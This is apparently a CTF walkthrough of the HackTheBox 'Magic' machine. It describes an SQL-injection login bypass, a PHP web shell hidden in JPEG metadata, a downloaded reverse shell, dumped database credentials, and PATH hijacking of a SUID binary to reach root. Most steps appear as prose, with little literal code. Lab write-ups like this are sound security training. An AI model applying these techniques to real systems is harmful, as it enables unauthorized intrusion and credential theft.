Magic — HackTheBox
Magic is a medium-rated machine created by TRX. Initial foothold is gained by bypassing authentication using SQL Injection and uploading a jpeg image crafted with a PHP web shell. After getting into the machine, we move laterally to a higher privileged user by collecting database credentials and collecting another password by dumping mysql databases. Root privilege is acquired by abusing a SUID binary that executes commands without full path.
Quick nmap scan shows two open ports: 22(ssh) & 80(http).
Visiting http port shows a gallery of some sort. There are pieces of hash found on most of the image but connecting them don’t lead to anything.
Clicking the bottom left ‘Login’ link will bring us to a login page. After trying common credentials which failed, I went and ran gobuster to find more directories while trying to do SQL injection to bypass the authentication.
Since whitespace is not allowed on the username field, I fired up burpsuite and intercepted the request in order to test SQL injection. After a lot of trial and error, I successfully logged in.
The upload.php page that I got redirected to only accepts jpg and png files so uploading a php reverse shell did not work.
While doing some research about how I can craft a malicious jpg image, I came across this blog post. It is about adding details on the image’s properties that contains php code. I thought that using exiftool would also do the same magic so that’s what I did.
The image was successfully uploaded but I don’t know where it was uploaded. Looking at the main page source code, a reference to /images/fulls can be found but this is not where the image was uploaded.
Going to http://10.10.10.185/images/uploads/troll.php.jpg displays this cryptic page.
Adding the parameter ‘cmd=id’ will prove that the exiftool trick worked because code execution was performed.
I used this to download a php reverse shell from pentestmonkey hosted on my python HTTP server.
The reverse shell is executed by going to /uploads/sh3ll.php.
Collecting MYSQL Credentials
After getting a reverse shell, enumeration continues. After a few minutes of poking around, I found a file that contains MYSQL credentials.
Database User is theseus and password is iamkingtheseus. I tried switching user to theseus using the same password but it did not work.
Unfortunately, mysql was not installed in the machine so I was not able to login. Luckily, mysqldump can still be used to dump the databases.
I dumped all of the databases and managed to find another set of credentials. I tried to switch to theseus user again with the new password and it worked.
More enumeration continues after escalating to theseus. While looking for low hanging fruits, I found an unusual SUID binary ‘/bin/sysinfo’.
I did some file enumeration using strings command on the binary to have an idea of what’s in it. It is running 4 commands that can be used to escalate privileges to root since it is running as a set uid binary owned by root.
lshw: displays hardware info about the machine.
fdisk: shows storage information.
cat: displays contents of /proc/cpuinfo
free: displays information about memory usage.
Since these commands are executed without full path, we can trick the binary to execute a file that will contain malicious code.
If the command’s full path is not written on the code eg. ‘cat’ instead of ‘/usr/bin/cat’, then the executed binary will go through the user’s $PATH and find the command ‘cat’. In this case, we can set the first directory of our $PATH to a writeable directory such as /dev/shm and sysinfo will look at that directory first for the commands mentioned above.
To make it simple, I created a file named ‘cat’ in /dev/shm that contains a simple ‘/bin/bash’ command to spawn a root shell. Put execute permissions on it, set /dev/shm as first directory on my PATH variable and ran sysinfo.
A root shell was spawned but commands are not returning any response so I did a different approach.
I downloaded shell.py into the target machine on /dev/shm and edited the cat file to execute ‘python3 /dev/shm/shell.py’.
I tried escalating using lshw first. Notice that the execution stops after ‘Hardware Info’ because that’s when lshw was executed which is in this case, the malicious file I created in /dev/shm.
Now I tried it with cat. I renamed ‘lshw’ to ‘cat’ and ran sysinfo again. Notice that this time, execution stops after CPU info because that’s when cat was executed.
This time with fdisk, I renamed the malicious file to fdisk and see that it stops after disk info where the fdisk command was executed.
And finally, I renamed the malicious file to ‘free’ and notice that execution stops after ‘MEM Usage’ where the free command is executed.
After performing the escalation using any of the 4 commands without full paths, we can grab the root flag to finish it off.
Thank you for reading. Stay safe and have a good day!